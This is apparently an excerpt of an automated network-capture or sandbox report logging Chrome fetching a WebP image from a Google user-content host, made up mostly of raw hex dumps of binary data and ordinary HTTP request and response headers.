                                                                                                                                                                                                                                  Data Ascii: ;<<|q\[*B#/#m}nTg ' rZiUgEXzJ[<t5sj9|Sl87}w]v~VM%a0q0OsfWKvXG&Z>F^1zB 0lSr9/-PWRl'UPOsHat5FsKZa; n
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 6d db 9e b6 91 24 19 82 85 64 ca 6d 60 78 26 ed 30 d3 32 33 33 d3 11 f3 fe 80 dd 23 66 66 66 66 66 66 de 2d d7 65 6e 03 76 6a 4b ba ae da 56 e4 cc 1f 90 23 c2 0d 00 b4 6d 43 f7 06 2c 4b ca 68 fb 7b bb ad 6d 79 1b 69 db b6 7d 3f e0 3c 4f 91 65 3b 71 12 57 a5 52 95 ee 82 e6 be 6e 66 66 66 e6 fb fe 84 df 99 99 99 99 99 99 19 9a b9 aa a1 3a 29 0c 1a 64 c1 09 c7 71 ec db 28 18 d7 88 ee 71 fd 00 59 d3 6d db c6 b6 6d cf 98 73 ed e3 38 cf f3 c2 ad 07 ef a3 d8 b6 6d bb ee 14 d3 f2 2f 52 4e 2d 2d ff c1 4e d1 b6 f9 ea 7b 8d 47 f7 7d 5f 3a cf e3 d8 6b ea 91 6d 5b b5 6d db a9 b5 f5 b1 d6 3e 70 ef e3 2f 66 66 c9 92 72 20 4f 96 5c 4a 83 52 23 eb e7 42 2e 79 4a 00 33 d3 fb 0f 2e df 7b f6 5e 6b f6 16 0e 24 49 52 a2 c4 e1 64 71 58 7b 80 fe 01 00 55 39 8d b5 73 ae db cc 1d
                                                                                                                                                                                                                                  Data Ascii: m$dm`x&0233#ffffff-envjKV#mC,Kh{myi}?<Oe;qWRnfff:)dq(qYmms8m/RN--N{G}_:km[m>p/ffr O\JR#B.yJ3.{^k$IRdqX{U9s
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 8a 4f 3d f1 93 3d 09 88 c8 e9 5d 49 46 52 2a 96 f6 05 88 48 2d 06 38 c8 25 9d 38 09 29 a6 bf 9d cb bc 24 de b0 ba 1b 3b a2 6c cb 1c d3 75 c0 09 4c 6a c4 1a 41 9c c0 ed 75 69 4b a0 a4 63 12 30 ac 0c 25 4e 84 4e 1d 44 17 4e cf b2 60 5e 58 b4 a3 50 53 04 d6 31 82 dc 52 c0 87 0c 94 87 10 f5 95 bc 40 9e 8a fe 9c fa 39 02 36 f1 7c aa 4b 26 81 90 af 98 81 48 67 bc 78 a5 2e 20 c7 5c 95 16 67 1a 44 a8 1d f9 e4 18 85 ec 4c 46 08 ab 42 45 a4 64 36 35 23 88 02 db 23 13 f1 e1 cd a6 0b bb ae 51 a3 c4 2a 59 ea 83 94 8b 5d a6 4c 64 5d a6 6c 48 a0 a4 d5 39 4c 7d e1 08 48 35 4e eb 24 14 f0 54 e4 b2 0b a5 e2 a9 53 7f f1 8d fd a7 9f d1 35 46 00 fa 62 e1 ce aa c7 bf 57 cf 1b 64 8c 16 ac c6 3d f7 f0 95 eb fd 20 5c 8d 6f 9d 5c 97 f9 8a 3f cf d7 24 99 6d 98 ab 71 c5 49 ab 92 4e
                                                                                                                                                                                                                                  Data Ascii: O==]IFR*H-8%8)$;luLjAuiKc0%NNDN`^XPS1R@96|K&Hgx. \gDLFBEd65##Q*Y]Ld]lH9L}H5N$TS5FbWd= \o\?$mqIN
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 6d e9 f1 54 34 91 63 62 11 c6 b5 f7 51 74 21 35 90 32 3b 4a 09 c3 1d ed 7b e3 fe 41 ae 0e b5 0c 69 63 cf 22 47 90 48 9c 1c 15 6b ff 9c a2 d8 86 4c 74 e5 d5 35 8e 42 e3 dd 5c a2 18 21 4a e0 f0 70 05 a4 c4 38 0b e9 e7 61 4f 7d ff c3 be a3 17 c6 a0 7b c1 3b af 61 d5 35 3f 37 6e dc bc d9 0c c0 e1 a1 e9 8f 5d 8e 66 1f 2a e7 6a 63 06 18 e7 7f e8 a1 9a 76 6d ea ce ce b4 25 23 86 3d 75 2a 85 1c ed 4d 13 44 7a e2 c5 b5 20 34 43 2b 95 6d 38 97 38 97 06 31 c3 de cc ef 73 19 77 ac 71 5e ee ba 3e 19 31 3c da 03 44 44 99 a9 18 53 a8 d7 48 68 84 d9 c2 69 4f 17 ca 44 34 ee 9c 66 47 36 65 16 50 4b db 47 5e 7e 4d 7e fe b5 f9 20 94 bf 52 b8 de 5b de fa ba ef 9d ff 2b 22 82 ee fd fd 95 6f 3e fc 92 4d cf 7f fb 9e f9 8f c8 6b 60 81 c0 60 be ef e2 a3 5f 3b e5 f8 4b b5 6d 76 16
                                                                                                                                                                                                                                  Data Ascii: mT4cbQt!52;J{Aic"GHkLt5B\!Jp8aO}{;a5?7n]f*jcvm%#=u*MDz 4C+m881swq^>1<DDSHhiOD4fG6ePKG^~M~ R[+"o>Mk``_;Kmv
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 62 d1 13 93 da 66 b7 c0 09 a4 ea 34 72 be fb 7e f1 f0 af 5d 47 93 ff ee c6 8f 8c e4 82 de f9 ce 52 8b a7 26 57 be e4 99 87 3d fb 3b f7 b7 fc d2 5b 27 5e 3b 83 89 40 b2 84 02 33 b1 f7 51 de fc d7 cc ff ca 53 85 0f 78 a1 f4 cc 16 6e 18 34 d5 7d c8 24 80 d7 3f 96 34 d4 d1 7b 19 fd fe 4f 0e bd 76 16 16 b5 66 db 46 48 7a 56 ba 7b ee 7f e9 3a 7a 38 5b be f8 13 83 27 0e 98 fe fd a5 df 72 31 ff bb 4e 5a bb 5d fb 0c d1 43 10 80 9e bf 2e 6a 3a e6 76 ed fb f3 1d f8 db fb fb 3f ed d1 3e 1d 30 29 62 b5 eb 5f 3c 16 ff e1 65 d5 63 b7 6b de fd d0 10 16 50 a3 99 db ed d0 e9 8e bd c7 31 fc 71 4f 06 ee 39 50 92 7c fc 7d dc f7 05 e7 ae af 7c 58 78 ac 89 b7 14 4f b0 ec 7e 0a c6 f4 82 ed ef 63 e9 bf 8c 4b bf fc 5b 4f 5f 9d e0 b5 6d 76 3e a5 b6 e5 2b 6f ca 1f 77 e4 77 53 c3 ee
                                                                                                                                                                                                                                  Data Ascii: bf4r~]GR&W=;['^;@3QSxn4}$?4{OvfFHzV{:z8['r1NZ]C.j:v?>0)b_<eckP1qO9P|}|XxO~cK[O_mv>+owwS
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: 70 d4 79 5f 3b f4 8e b3 62 2c dd 07 aa 80 0c 40 7c 8c 97 dd a8 91 a2 58 ae b2 ff 9c 01 79 e4 93 b7 74 7a cc 9d 8e 22 01 19 7c e0 8b e6 82 bf be 8f 71 86 de 34 1a ab 16 2f bc 88 9a 47 7d 41 ef 2c e7 4f 8d fc 09 e1 df 8b 90 29 31 05 dd 5b f3 5f d7 fe f5 08 78 c5 da d7 17 98 ed 9e 40 8c 7b 37 34 55 6a cc 53 36 5d 86 0e d3 7f 78 84 f6 7e f0 a3 b1 13 d5 7d a4 24 04 fa e9 6b df b5 a5 b7 8b 3c 78 14 13 7d e5 a0 00 e6 da 94 5b 69 5f 49 e2 73 1b 4c 15 e6 bb bc 84 f7 f1 51 8a fc 77 fa 60 88 f7 92 a5 06 f3 d9 2a 94 3d db ab 6e 55 3e 19 45 32 42 4e fe 23 1b 6e 14 d9 ba 8e a9 11 55 ef c7 74 b3 85 d7 72 17 bb 38 1a 8f 97 93 a9 9c c9 7e 93 90 2d 38 3b 41 bd 1b ae ee be 2d bf f3 78 82 eb 29 f0 69 0e e7 5b 8c e3 a2 b9 02 4d 0d 66 6b 15 72 af d9 3f 8e ea 23 0d b7 46 5a e5
                                                                                                                                                                                                                                  Data Ascii: py_;b,@|Xytz"|q4/G}A,O)1[_x@{74UjS6]x~}$k<x}[i_IsLQw`*=nU>E2BN#nUtr8~-8;A-x)i[Mfkr?#FZ
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: bf 02 8b 01 e8 5a 60 40 ee 1e 4c f7 49 38 57 2d a1 c1 1a 55 14 11 88 65 07 47 87 00 17 21 34 0d 4b c9 fe 35 0c 58 8a 15 75 d4 31 a1 32 d2 a8 ea 01 bc bf 6d 9c 28 43 61 be 6a 93 fd 7a d7 3d 29 2a a4 c1 40 d0 d2 32 a9 b7 75 ad 55 b2 00 0d 68 50 54 82 83 7b 11 8d c1 a2 8b d0 0c 36 5a 07 91 43 87 8b 47 8a 00 c0 24 a8 a7 e7 43 0b a2 92 1c 5b fa 01 d8 44 d5 e0 66 dc 9c 59 33 48 1d e6 2a 16 db 40 89 d5 67 cb 6f 9c 38 1e 0e 50 9b cc 50 53 80 19 9b ed c4 3e 35 62 90 df 8c 83 22 14 08 79 3b 4f d1 4f 81 f3 e8 41 d3 b0 38 01 84 89 82 25 0a 28 d2 27 e3 21 02 30 9b 97 d4 97 4d 6a 3a 31 12 2d 53 c0 a1 2e 4f 28 41 ed ea 6e 69 e4 c3 87 73 c8 76 6e 98 fb 58 ca b3 bc 82 06 a6 02 04 85 1d 66 d9 4a 13 49 76 ec 40 42 7d 6c 8f 2c 65 c1 e5 17 bc 81 11 16 61 c4 2f 69 49 cb 01 56
                                                                                                                                                                                                                                  Data Ascii: Z`@LI8W-UeG!4K5Xu12m(Cajz=)*@2uUhPT{6ZCG$C[DfY3H*@go8PPS>5b"y;OOA8%('!0Mj:1-S.O(AnisvnXfJIv@B}l,ea/iIV
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: a0 87 74 84 88 74 d0 1d a9 ae 59 f1 cf 4a 11 16 18 8d 45 7f 5a a5 b0 5f 8c 1a f6 e9 b3 03 68 40 0f ab 49 6a 00 82 1a 95 3b dd cf b0 7e dd 3c e9 a6 96 19 7d 99 f3 0e db 70 22 a3 ca 0e 02 1c 52 6c 20 a9 29 9d 54 fa dc 98 0c 86 cb 50 eb ba 36 ed 50 6a 58 d0 7c f7 7c 6f d1 c2 7b 63 6c 8e d6 06 b8 fb 81 3c 1d 34 e7 bd 27 67 9c e9 d3 dc a3 57 00 11 9d 61 c5 2d 08 6d 5a 26 cb 55 5e f4 8e 15 5b 7c a9 1c 6a 28 e5 57 76 bf 46 8d 8c fe 3a 8e b6 8f a5 ec e4 04 26 e8 27 61 36 43 c6 5c 7a 31 a7 1c f3 7b 59 5a ad 7a 93 28 4e e9 41 8f fc c8 4d fa 26 b6 0d 3d cb a9 dc c1 a1 f8 2c 21 61 6b ec ca e6 92 29 de e3 df b3 64 71 bd 67 88 72 c2 d5 7e 57 5a df 69 18 4a 47 5b 6f 18 90 2a ce 40 fb 6f 22 86 36 73 1a 4a fe 2c 01 36 d0 47 33 c6 dd 4f bd f1 78 fd 3f e4 5e 7d 45 a3 48 b2
                                                                                                                                                                                                                                  Data Ascii: ttYJEZ_h@Ij;~<}p"Rl )TP6PjX||o{cl<4'gWa-mZ&U^[|j(WvF:&'a6C\z1{YZz(NAM&=,!ak)dqgr~WZiJG[o*@o"6sJ,6G3Ox?^}EH
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC1390INData Raw: a1 eb d9 68 65 53 0f 4c c3 8d 2f f5 6f 2d b3 2c ed 4f ba 66 f3 de b5 22 e2 a7 47 bb cd f6 1d 90 95 b9 fd 0d 00 b8 7b f7 ee 58 85 b1 c8 77 d6 f9 1b 77 1a fb 1b 3e ee 77 76 b2 fc bc 1f fe fc e7 7c e7 c7 ab db 87 df ad 84 db d5 d6 47 45 4d 15 04 5c ab 8d 92 82 e6 50 56 89 04 d4 1c 64 11 80 82 17 e9 f9 00 af 4b 8a e2 e4 27 a6 e3 46 de 6b 77 42 db b7 9e d8 34 b6 55 d9 fa 81 f3 ea 94 7f 5e 67 02 1f 4f 0f e0 11 7d d8 fd bf 95 6f 70 7d 75 cc 42 73 77 e7 e3 c5 97 ee be c2 bb 7f 0c 9f fe 1a f0 e1 eb f7 5f 3b bf 62 07 af 7e 14 8e 3f fa 35 af ff cb 58 00 3e b6 5f c2 2e 72 aa 60 d2 c8 00 82 06 7e a0 a8 34 60 50 ac b8 66 84 de ae 5b ce be 30 b2 57 dc 67 d5 4e ff 72 77 71 e7 34 8b c6 ae 52 0a 5a dc a1 29 09 49 50 d2 94 e5 0c 9c aa 2f 2c 76 02 65 54 04 bd 94 83 10 45 d0
                                                                                                                                                                                                                                  Data Ascii: heSL/o-,Of"G{Xww>wv|GEM\PVdK'FkwB4U^gO}op}uBsw_;b~?5X>_.r`~4`Pf[0WgNrwq4RZ)IP/,veTE


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  126192.168.2.649982142.250.185.2464431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:47 UTC510OUTGET /K6kGejYk6GTdg5AenV4A0e-Nc48xjZ_-Qj50IUO5pUCf0V6EpJbeOku4Rk73atcPD4A=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC531INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 75826
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 1
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC859INData Raw: 52 49 46 46 2a 28 01 00 57 45 42 50 56 50 38 4c 1e 28 01 00 2f 9f 81 32 00 4d 48 0c c0 36 6c 9b 00 14 08 49 90 fe 3f d8 ea f6 42 44 ff 27 40 6a 03 08 9e 7e 26 92 9f dd 66 77 af 19 c7 00 6d 7b 59 c2 df 04 b0 3e d4 1f bc 3d 04 40 01 ed 82 1d db 56 f2 09 f8 e0 08 2a f2 2b f8 ee 3a 01 86 3d fc 4e f8 06 2c 20 00 ee bd 49 02 5c 9f 7b ef ed aa fc 38 48 ce 84 d3 0e 99 24 64 0e 0f f8 3b 49 c2 9c cf 39 07 b8 48 55 92 41 60 42 9e 73 86 ef ed 24 bf fc 23 92 5c a0 26 40 f2 47 92 b0 65 7b bb c8 84 e4 6c 40 49 80 00 37 01 8c 83 78 c6 97 40 71 2d 70 f9 39 98 e7 b2 a5 9c 93 2c e3 ef 93 7b c9 90 7d aa 0c 7f e7 34 09 db 96 f4 b8 1f 63 5a b2 c9 00 f3 9c 93 40 28 60 d8 fa ec bd ed ee d9 2d f1 9e 5b 09 80 79 4e f2 40 2f 60 4c 2f 9e 31 28 79 62 3e b6 6d 7d ee 2a c7 f1 6d 20 24
                                                                                                                                                                                                                                  Data Ascii: RIFF*(WEBPVP8L(/2MH6lI?BD'@j~&fwm{Y>=@V*+:=N, I\{8H$d;I9HUA`Bs$#\&@Ge{l@I7x@q-p9,{}4cZ@(`-[yN@/`L/1(yb>m}*m $
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: 8d 9c 3b f7 22 84 4a e5 1b 94 f8 1a 4c df 4d 6d c5 76 cd 11 47 d3 11 97 57 c0 33 3c 1b f8 62 78 de 2c 8d 13 db f3 f5 f1 7c bb e3 ff a3 fd 14 b9 bd 76 bb d2 24 4e f5 a2 01 a2 e6 85 39 7a 74 41 0a 54 8d 1a 15 14 a0 34 7c c3 50 a3 26 75 9b d9 fa 74 e8 9c 70 8d 67 0b cf 76 fc cc b5 e6 62 e5 31 fb cb 3f 87 ab 1f cb bc 2c e3 9b eb 2d f5 a8 02 f4 1d 8f 9a d7 d6 5b d6 4f cd a6 0a 78 a1 26 2e 53 8f 07 89 28 00 08 00 8a a9 4a e0 f5 01 a1 41 32 25 da 05 c6 c3 54 0f 5d 78 80 e3 f5 66 b4 76 51 2b 11 8a 71 de 94 68 c1 a1 bf 34 3b ca dd 28 98 af 54 6b a3 99 7c 77 88 8b 5e 94 65 01 60 53 14 c5 99 ba b6 87 75 61 1d ae 54 54 3d 40 10 c4 c9 f0 b2 b6 32 34 8b ef 22 7c c6 f9 17 bf 7d d8 56 a3 fd 37 bd b2 dd 5f 67 94 f4 a8 58 9e 10 c4 1c e7 2e 0c eb 05 f9 b9 af ef 58 06 8b be
                                                                                                                                                                                                                                  Data Ascii: ;"JLMmvGW3<bx,|v$N9ztAT4|P&utpgvb1?,-[Ox&.S(JA2%T]xfvQ+qh4;(Tk|w^e`SuaTT=@24"|}V7_gX.X
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: a1 55 97 af 97 97 f3 ec 3a bb ca a9 6f 3a a6 7b 81 16 94 45 3c f0 c6 6d a9 6b ab d4 6d dd ed 8a 97 b7 6d 4d b7 b9 35 57 db 8a aa 1d 80 17 9f a6 9b db 9c 5b 35 6f d4 20 e5 fb 74 f3 78 d6 b9 f5 38 41 05 bf a8 73 53 9d 8a ea e6 00 ca 97 0f 3e 36 bf 4e a9 55 82 a8 80 20 4c 38 d6 be e8 7e 5d a7 8a e0 01 a6 8a b9 db 5e e4 8b 12 20 36 a1 36 b3 56 6b be ce 1e aa 0e a0 b2 eb 7a 7e e5 83 5d 45 c0 42 2a 87 ec d3 50 0e 0e 12 90 2d e7 30 cf 5a 7b e5 44 10 3a 6f e6 ff 79 a1 02 3e ef 1f 82 27 8f 2a c7 fc 1f 57 ae d9 ff bf b6 6d c9 99 73 df 5b a6 7d cb 7b ef 3d 94 a8 45 dd 5c 82 82 cd e4 bd 98 f7 5e c2 de 7b ef bd f7 de 7b af f2 de 57 ad 01 e6 da fb 76 9d 08 3e 54 e1 78 a9 b8 e0 a5 7f f8 c3 23 85 af a8 12 e8 38 9a 4e 7a f1 82 93 fe f0 48 61 cb c5 d1 79 0c a6 67 d0 4d 2f
                                                                                                                                                                                                                                  Data Ascii: U:o:{E<mkmmM5W[5o tx8AsS>6NU L8~]^ 66Vkz~]EB*P-0Z{D:oy>'*Wms[}{=E\^{{Wv>Tx#8NzHaygM/
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: f5 3e e6 da fb dc af d0 5a 5a ca 27 b0 3f b6 ae 04 16 2e 16 58 50 02 8d fb 0b 40 39 f0 b1 b4 a9 b5 86 73 ce 5e 73 f6 1e 13 20 27 db b6 c5 72 c2 cc cc 9c 8a a1 62 e6 8a b1 62 66 66 66 66 66 66 66 a6 8a 99 99 99 99 e9 9f ff 9b b3 47 c1 eb 63 54 8c a0 a0 a7 68 88 8d b5 10 9a 2e 22 8e 8a 5c 51 16 09 71 10 23 11 c1 06 d8 c3 76 a3 21 a6 a2 2f 65 fa 44 45 ca d8 88 84 75 93 6e 8d 44 c4 18 89 88 71 15 31 6b e4 18 48 b7 06 82 dd 71 11 11 13 f0 e3 9e 3c 82 7d ed 72 27 bb 0a 20 87 8c 22 97 52 4a 82 ef 8c 5d b0 a7 81 bc 41 69 cf 80 fa 0e 07 58 46 20 55 54 23 15 80 23 04 e5 0c a5 26 95 06 39 69 b1 bd 96 68 2c 08 53 df e9 71 a8 2c 00 8a ab 2c 4e 02 c4 ea 1a 26 23 90 94 2e 41 d4 9c a6 e6 4d cb 89 68 6a b9 c4 55 a9 60 3c 66 0a f0 c4 e5 02 70 d3 97 09 08 ac a5 e6 65 65 72
                                                                                                                                                                                                                                  Data Ascii: >ZZ'?.XP@9s^s 'rbbfffffffGcTh."\Qq#v!/eDEunDq1kHq<}r' "RJ]AiXF UT##&9ih,Sq,,N&#.AMhjU`<fpeer
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: cf 10 1e 0d 47 59 f3 51 32 0c a6 1a 96 e1 00 ab b0 b4 43 45 e8 c0 c1 58 68 cb e9 4a 19 8a b4 6c ba ea 87 1c 66 2b f3 13 5e 34 50 ca 96 0f f5 a2 da a6 3c 15 cd ca 21 59 33 9b 28 c1 49 1c 74 d7 a0 83 6f d4 10 a8 84 68 dc 6d 57 1c 1b 4d 45 d6 6a a3 d1 3c 92 de 0f 95 c0 ec 60 08 3a c9 ed 61 19 32 04 0b 7a 06 3b f3 3d 8c 3d ee ce ee d2 35 d4 5a ab 1f 1c 5e a7 d3 1b e0 dd 37 57 50 d3 74 57 18 08 a0 cc 34 63 d1 35 d0 00 4a 1b af 99 bb 1f 5c 7f 6c ca cc c7 d6 72 6f ee 9e 07 ee ee f8 8c bb b8 e6 5a 0f f0 36 41 09 65 0f 02 22 4f 5c 49 ef d9 5f 10 40 0b c8 f8 bd 78 7f 58 eb 99 2f 9b 8d 27 4e a6 0b af 97 50 57 06 c0 9b 54 43 21 28 37 15 e0 a6 44 02 68 df 82 d5 49 e6 38 11 02 38 b6 38 37 cd 07 a5 46 00 89 af 68 aa 4e 84 39 27 f0 6b 01 dc 80 79 30 00 74 43 ab 70 67 c9
                                                                                                                                                                                                                                  Data Ascii: GYQ2CEXhJlf+^4P<!Y3(ItohmWMEj<`:a2z;==5Z^7WPtW4c5J\lroZ6Ae"O\I_@xX/'NPWTC!(7DhI8887FhN9'ky0tCpg
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: 79 32 62 24 14 d9 6a 00 25 b0 56 4a 2a 83 d7 f7 17 ce cb 14 16 a9 5f 32 c5 18 03 01 cb 57 ee f3 69 8e f0 e0 ee 4c 69 1c da ba 39 53 9b d3 da 0a 83 d4 1c 66 f4 a6 ba 72 6d cf 36 18 00 dc 3c 3c f0 54 ed a5 f7 e8 c1 d3 36 1a 8d 56 46 f4 c9 72 0d 02 f6 9d 7e de b1 7f ae ed 09 90 47 26 12 c2 7b ef 80 1f f0 ac 09 4e d9 9a 58 9a 88 48 6f de 08 e5 c8 29 8d 40 7a 80 34 ca eb 73 7d e4 d7 b8 ac 8e 40 75 a6 01 4e 4b 14 98 af a8 8b 32 b0 02 e8 0d 93 4d 3c bd 04 70 9f ee ab 35 5b b9 02 5b a1 6d 00 51 a2 cd ac 09 74 4a a5 80 c9 0c a8 29 27 ed b8 63 a0 a7 fb f9 c4 06 ad 84 33 65 10 9b 44 1e 35 40 08 8f 1d 44 23 e4 d4 47 d4 4a 11 42 b1 01 f1 68 1d 33 a8 8b 6e 49 d1 10 17 62 ec d4 4b 8f 2c df 3f 28 f3 63 d2 a6 58 c9 8e 39 92 bf ee 78 79 bf d1 0d 3d f7 c2 a8 e7 48 7a 73 93
                                                                                                                                                                                                                                  Data Ascii: y2b$j%VJ*_2WiLi9Sfrm6<<T6VFr~G&{NXHo)@z4s}@uNK2M<p5[[mQtJ)'c3eD5@D#GJBh3nIbK,?(cX9xy=Hzs
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: 86 1b 59 b3 d9 6c 1e 19 36 23 2b 24 27 b2 71 d9 0d 17 fc 30 4b f4 db c5 6a d3 3a 47 e4 aa 30 36 a9 b3 a4 c3 cc cd 37 98 37 96 f2 50 41 d3 35 13 82 a4 df 5c 08 33 39 09 7b 0e a2 58 0c d6 d7 b3 31 e4 a0 0e d4 8b 3e 48 f9 41 c9 a5 c9 9d 16 76 56 fa 7c b3 d5 a5 cb 4a 5d 42 45 60 72 0f 1f c4 77 f8 e0 0f 07 6a 1d 58 bb 38 06 34 79 7b 55 a8 af cc 6f 60 7e fd f3 fc c1 99 5f 74 f1 0b c2 2f 31 fe 9c f8 23 e1 0b 05 b8 2a 8f 87 6b e0 1d d0 77 08 ef 54 be 42 f8 fb e9 eb e9 68 10 bc e2 b0 b3 f4 c9 93 3c 31 41 d4 69 82 e3 04 3e 05 e2 d2 16 52 01 31 c0 96 59 38 47 81 a0 05 04 a9 74 82 5c c8 89 58 44 14 22 03 9c 11 86 4c 23 40 00 69 ff ab fe f1 fe ed ff f7 2c 9a 2d 3d e4 dd 73 11 14 b5 af da 8b db 32 94 67 ad 8b 13 5f 78 fb da fa 3e 1a 7e 05 4b 79 ee bd c5 6e f8 ae fb 9f
                                                                                                                                                                                                                                  Data Ascii: Yl6#+$'q0Kj:G0677PA5\39{X1>HAvV|J]BE`rwjX84y{Uo`~_t/1#*kwTBh<1Ai>R1Y8Gt\XD"L#@i,-=s2g_x>~Kyn
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: b0 11 a8 8a 04 8a 07 c7 d8 62 d1 2d 3b 63 8b b6 53 e6 b7 ea 8f c4 fd 6c d1 46 e4 25 73 61 30 93 62 8e 8c 55 f7 08 68 3d ba 5e 13 70 f7 5e e3 f0 89 c4 b9 f9 f3 71 1f 6d f4 e8 1d 8f 7c a6 f1 a1 22 97 c2 05 26 3a 5a b2 9a 10 c8 26 93 c9 ab bf e8 4d 2b 26 45 02 ba d4 7c 91 77 78 2b 47 42 46 b9 81 07 73 33 de 7f b8 db 8d ce 43 bd 4d b7 dd 34 e2 59 db 1e 0a 81 5c 0f 42 f8 e8 86 d1 2a f4 7c 57 55 69 4c 69 ac ce 19 e6 18 e1 cb c2 0b 43 df f3 31 14 29 e6 a0 3f f6 40 22 14 39 f7 0c ee 91 36 5b 90 b2 e7 4c 6b 40 e7 5a 4a 4a 22 64 f8 08 97 16 2f d7 d3 04 67 31 ca bb 6e 92 0c f6 9a be 18 28 18 d4 3d 23 d4 d4 b0 60 b2 8d 41 69 97 f3 65 2c de ea a8 d1 a8 1f 46 7a 96 c6 41 69 16 8b c5 48 c0 9a 6e 7b 71 ab c5 50 e7 7a b8 42 d7 11 d7 5b bc 9f 3d b9 bc f8 40 67 3d 9d e8 71
                                                                                                                                                                                                                                  Data Ascii: b-;cSlF%sa0bUh=^p^qm|"&:Z&M+&E|wx+GBFs3CM4Y\B*|WUiLiC1)?@"96[Lk@ZJJ"d/g1n(=#`Aie,FzAiHn{qPzB[=@g=q
                                                                                                                                                                                                                                  2024-09-29 04:53:48 UTC1390INData Raw: 51 5a 81 a4 8d a5 fb 02 46 4d 88 5a 65 5e 34 b3 65 30 cd e5 c3 73 73 c6 76 33 55 51 e5 d2 b8 e9 4c 69 5f 53 f5 40 a5 83 bc f9 59 57 3f 44 34 6c 5e 14 db b4 39 df 5a 6c 97 1a af e0 aa 38 0a 97 8a 03 3c b8 a8 8b dd f4 70 fb 54 26 1a 09 75 97 2f 6c 4a 7c eb ad e2 54 9d 9e 8c a1 77 85 0f 8b 2d 41 75 63 23 ac 51 f5 4f 0e dc f8 3f bb ab 61 22 86 d1 25 a0 ba b2 8c 2c 9c 97 c3 6a 4a 5b 78 ce 77 d5 f4 86 6f 9f 97 be f3 fe eb 27 a6 fe 6e 5b 02 8f 9f 0f 7f f7 f4 65 f0 4e f9 cd cb 6f d2 3a b2 05 67 0e 77 42 74 68 e0 e0 23 6a a7 33 9c 71 fa f9 81 b6 8c e7 ce be 3c 51 75 40 9f 73 f4 31 ca 58 9c c3 37 08 01 04 4c ac ec c8 58 69 8d ab 6a 4e 48 de 61 a9 ef 53 6a aa db 11 48 eb 2a 63 31 58 a2 1e 93 ef 9f 7b b2 28 31 c7 74 d1 da 09 88 1d 13 de 40 a6 cd 56 11 2e 37 8b fd e1
                                                                                                                                                                                                                                  Data Ascii: QZFMZe^4e0ssv3UQLi_S@YW?D4l^9Zl8<pT&u/lJ|Tw-Auc#QO?a"%,jJ[xwo'n[eNo:gwBth#j3q<Qu@s1X7LXijNHaSjH*c1X{(1t@V.7
